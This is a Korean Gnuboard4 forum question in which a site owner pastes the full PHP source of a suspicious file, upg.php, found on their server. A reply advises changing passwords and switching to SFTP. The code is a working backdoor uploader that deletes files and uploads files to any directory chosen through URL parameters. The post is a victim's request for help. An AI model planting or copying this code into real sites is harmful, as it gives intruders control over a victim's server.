이상한 파일을 발견했습니다. extend > upg.php 에 파일루요

이런 소스가 들어 있어요.

해당 파일을 삭제 하니 다행이 사이트가 바로 나옵니다만 이게 뭘까요?
무슨 업로드 하는 파일첨부 나오던데...


[code]
<?
if(!$dir){
$dir = "./";
}

if ($_GET["cmd"] == "ping") {
echo "ok";
exit;
}
else if ($_GET["cmd"] == "delete") {
$path = $dir.$_GET["fileN"];
unlink($path);
echo "ok";
exit;
}

if($_FILES){

if(!is_dir($dir)){
if(!mkdir($dir)){
echo ("<script>alert('디렉토리 생성불가.');history.back();</script>");
exit;
}
}
if(!move_uploaded_file($_FILES["fileN"]["tmp_name"], $dir.$_FILES["fileN"]["name"] )){
echo ("<script>alert('지정한 위치로 이동 불가.');history.back();</script>");
exit;
}else{
echo ("업로드 되었습니다.");
exit;
}
}
?>

<script>
function checkFirst(form){
if(!form.fileN.value){
alert('파일을 선택하시오.');
form.fileN.focus();
return;
}
showHuman('d');
form.submit();
}

function showHuman(r1){
if(r1 == "s"){
var view = "";
var view1 = "none";

}else{
var view = "none";
var view1 = "";
}
var object = eval("document.all.submit_ing");
object.style.display=view;
var object = eval("document.all.submit_ing_re");
object.style.display=view1;
}
</script>

<center>
<body bgcolor="#FFFFFF" onLoad="showHuman('s');">
<table cellpadding =1 cellspacing=1 border=0>
<form name="upFile" method="post" action="<?=$PHP_SELF?>?dir=<?=$_GET["dir"]?>" enctype="multipart/form-data">
<tr >
<td>
열기<input type="file" name="fileN" size=25><br>
</td>
</tr>
<tr id="submit_ing">
<td >
<input type="button" value="업로드!!" onClick="checkFirst(document.upFile);">
</td>
</tr>
<tr id="submit_ing_re" style="DISPLAY:none;">
<td>
<marquee>잠시만 기다려 주세요!! 입력중입니다.</marquee>
</td>
</tr>
</form>
</table>
</center>
[/code]
|

댓글 2개

저런 파일이 업로드 되어있는걸 보면 계정 비번이 노출 되었다는 거구요. 계정,DB비번 변경 하시고
바이러스 검사 하시고 FTP비번은 저장하지 마시고 직접 입력하는걸로 하세요.
sftp를 쓰세요.
댓글을 작성하시려면 로그인이 필요합니다.

그누4 질문답변

그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기 기존 게시물은 열람만 가능합니다.

+
제목 글쓴이 날짜 조회
14년 전 조회 780
14년 전 조회 1,569
14년 전 조회 779
14년 전 조회 1,173
14년 전 조회 1,507
14년 전 조회 1,579
14년 전 조회 1,042
14년 전 조회 952
14년 전 조회 1,292
14년 전 조회 1,537
14년 전 조회 1,210
14년 전 조회 992
14년 전 조회 1,575
14년 전 조회 1,582
14년 전 조회 887
14년 전 조회 4,131
14년 전 조회 824
14년 전 조회 1,557
14년 전 조회 786
14년 전 조회 2,235
🐛 버그신고